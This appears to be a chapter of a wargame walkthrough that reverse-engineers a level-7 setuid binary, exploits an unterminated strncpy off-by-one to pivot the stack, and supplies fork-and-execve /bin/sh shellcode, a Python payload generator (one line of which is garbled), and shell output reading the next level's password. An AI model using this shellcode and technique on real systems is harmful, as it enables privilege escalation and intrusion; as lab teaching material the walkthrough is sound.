The first few lines, up to the cmpl & je should be familiar (if not, see the previous chapter for a detailed description) and mean first, that the address to the arguments is stored at ebp-0x3fc, and second, that the program expects exactly one argument.

The next lines are somewhat more tricky and important to this level:

 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>

The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the return value is tested to be 0, and a jump is performed accordingly.
Now, what is this ptrace, what are the arguments, and why is it crucial for this level.
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):

PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include 

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...

OK, what can we learn from the man pages:

The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
The function returns -1 on failure.

So, in our case, ptrace fails, it will return -1, trigger the sign flag, which means that the jump branch will not be taken and we go to:

 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>

That's just an error print and an exit.
When will it fail? Well, if the process is already marked as being traced, then ptrace will fail, it will happen if we try to debug the program by running it in gdb. This can be averted by setting a breakpoint before the test instruction and changing the value of eax so that the test will pass. This is not important for this level, but it's good to know.
The real important thing is, that since the process is in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.

 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax

This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).

 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>

Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:

 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax

This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
However, and this is important, there is an interesting point about strncpy, and that is that if the source string is longer than the limit, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.

 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00

This puts a string terminator after the end of buf.

 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>

This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are turned towards:

 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>

This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:

 804857c: e8 f3 fd ff ff        call   8048374 
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. The thing is, that when ret is executed, it pops whatever esp points to, and jumps there.
Notice that before the return, esp is loaded with ecx-4, while ecx is popped from the stack.
Before we continue, I just want to sketch the stack:

Now suppose this scenario:

We supply a very long, yet to be determined, argument to the program.
The important thing is that we want ecx to be 0xbfff0100.
This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written on the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
That address is actually an address inside buf.
When at the end of main, that address (-4) will be loaded into esp, we can make sure that it contains the address of the bottom of buf.
The bottom of buf itself will contain a shellcode.

So, let's analyze how ecx might be affected. First, let's see what's its value is without any arguments:

level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0

We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:

(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100

Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes blow that, at ebp-0xec, we should prepare the address ebp-0x3f0=0xbffefcf8.

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the ptrace is active only on the process that called it, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want out shellcode to be the equivalent of the following C code:

pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}

We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).

(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 :	pop    %ecx
0x00c6f951 :	mov    %gs:0x4c,%edx
0x00c6f958 :	mov    %edx,%eax
0x00c6f95a :	neg    %eax
0x00c6f95c :	jne    0xc6f963 
0x00c6f95e :	mov    $0x80000000,%eax
0x00c6f963 :	mov    %eax,%gs:0x4c
0x00c6f969 :	mov    $0xbe,%eax
0x00c6f96e :	int    $0x80
...

Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:

pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);

So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL) . Using a pid of -1 means it waits for any child process (from the man page of waitpid).
The disassembly of wait4's wrapper is:

(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 :	push   %esi
0x00c6ef71 :	push   %ebx
0x00c6ef72 :	mov    0x18(%esp),%esi
0x00c6ef76 :	mov    0x14(%esp),%edx
0x00c6ef7a :	mov    0x10(%esp),%ecx
0x00c6ef7e :	mov    0xc(%esp),%ebx
0x00c6ef82 :	mov    $0x72,%eax
0x00c6ef87 :	int    $0x80
...

So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.

level7@blackbox:/tmp$ cat &gt; shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$

It works.
Let's extract the raw code, and embed it in a script:

level7@blackbox:/tmp$ cat &gt; gen7.py
import struct

SHELLCODE = "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd8031c050682f2f7368682f62696
e89e3505389e131d2b00bcd80".decode("hex")
BUF = 0xbffefcf8

ARG = SHELLCODE
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
ARG += struct.pack("ARG += 'X' * (0xd9a0 - len(ARG))

print ARG

Show time:

level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ұ
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????

On to the next level (sorry for the spam there, but that IS the output)